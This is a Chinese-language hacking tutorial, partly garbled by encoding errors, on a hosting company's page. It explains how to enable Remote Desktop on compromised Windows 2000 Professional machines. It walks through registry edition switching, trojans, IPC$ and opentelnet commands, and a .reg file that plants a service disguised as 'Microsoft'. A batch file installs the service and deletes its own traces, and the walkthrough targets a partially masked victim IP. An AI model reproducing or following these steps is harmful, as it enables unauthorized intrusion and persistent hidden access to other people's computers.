在2000專業(yè)版下開(kāi)3389

在win2000 Professional版中安裝3389終端服務(wù)
眾所周知windows2000 profassional并不支持3389終端服務(wù)，所以我們?nèi)绻�發(fā)現(xiàn)得到管理員密碼的肉機(jī)是此版本，只能放棄安裝終端服務(wù)的念頭。但是現(xiàn)在我們已經(jīng)可以在profassional版中安裝終端服務(wù)了！
方法如下：
1. 將profassional版改變?yōu)閟erver版
2. 安裝終端服務(wù)

關(guān)于安裝終端服務(wù)的細(xì)節(jié)網(wǎng)絡(luò)中已經(jīng)有許多優(yōu)秀的文章，這里不再重復(fù)。

下邊就說(shuō)說(shuō)如何將profassional版改變?yōu)閟erver版：

原理：其實(shí)windows 2000的各個(gè)版本都使用了同樣的程序、動(dòng)態(tài)鏈接庫(kù)，它們之間最大的差別是在注冊(cè)表中。windows2000三合一光盤(pán)就證明了這一點(diǎn)。因此只要將profassional版注冊(cè)表中的相關(guān)項(xiàng)目改為server及以上版本，就可以在profassional版中安裝終端服務(wù)了。

現(xiàn)在3am Laboratories已經(jīng)將改變win2000版本的方法做成一個(gè)非常方便使用的軟件：NTSwitch，讓我們可以隨心所欲地快速改變版本。此軟件可以在小鳳居中下載到，下載地址為URL http://www.chinesehack.org/down/show.asp?id=2192&down=1

可能由于微軟的壓力，3am Laboratories已將此軟件從其主頁(yè)中刪除，大家快下載吧！

遠(yuǎn)程版本變換的具體實(shí)現(xiàn)方法：

法1：
1　在遠(yuǎn)程肉機(jī)上運(yùn)行支持圖形界面的遠(yuǎn)程控制程序（如：冰河、PcAnyWhere等）
2　遠(yuǎn)程控制下，下載并運(yùn)行NTSwitch改變版本
3　安裝3389終端服務(wù)

此法非常方便，技術(shù)要求最低。但操作過(guò)程對(duì)方是全部可以看見(jiàn)的，非常危險(xiǎn)！

法2：
1　自己將自己本地的win2000 professional改變?yōu)閣in2000 server版，利用注冊(cè)表對(duì)比軟件對(duì)比版本變換前后注冊(cè)表的差別。將差別制作成一個(gè)chang.reg文件。
2　利用所得到的肉機(jī)管理員密碼，開(kāi)啟肉機(jī)Telnet服務(wù)。
3　Telnet上肉機(jī)后，利用regedit.exe /s chang.reg 命令， 將遠(yuǎn)程注冊(cè)表改變，從而實(shí)現(xiàn)遠(yuǎn)程win2000的版本變換。

此法需要一定的經(jīng)驗(yàn)，但操作很安全。而且可以用“迷途vb”的方法進(jìn)一步安裝3389終端服務(wù)。

以下是“迷途vb”的安裝3389終端服務(wù)方法

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
首先我們制作開(kāi)啟3389的工具
先把下面的注冊(cè)表內(nèi)容copy一份，另存為3389.reg注冊(cè)表文件
注冊(cè)表內(nèi)容：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的內(nèi)容保存為批處理文件3389.bat
安裝批處理內(nèi)容：
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解壓縮包

61.188.***.*** user:administrato pass:空
先使用工具letmein判斷其操作系統(tǒng)
letmein \\ip -all -d
TsInternetUser (TsInternetUser)這個(gè)是2000的終端用戶，現(xiàn)在可以判斷其為2000server了
再使用終端登陸軟件看看他的3389是不是已經(jīng)開(kāi)啟了免了費(fèi)事折騰
應(yīng)該沒(méi)有開(kāi)啟了
建立ipc連接
copy工具過(guò)去
net use \\ip\ipc$ "pass" /user:name
copy file \\ip\admin$\system32
用opentelnet開(kāi)對(duì)方的telnet
opentelnet \\ip name pass 1 99
用telnet進(jìn)入
進(jìn)入到對(duì)方的winnt\system32\
目錄
解壓縮3389.exe
運(yùn)行安裝批處理3389.bat
現(xiàn)在我們把對(duì)方重起一下，用reboot
我們用ping命令監(jiān)視他的上線情況，等他下線，呵呵下了，又上來(lái)了，不慌連，3389等會(huì)才能好，對(duì)方的機(jī)器有點(diǎn)慢
看見(jiàn)了么，開(kāi)啟成功!

億恩科技地址(ADD)：鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP)：450008 傳真(FAX)：0371-60123888
   聯(lián)系：億恩小凡
   QQ：89317007
   電話:0371-63322206

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]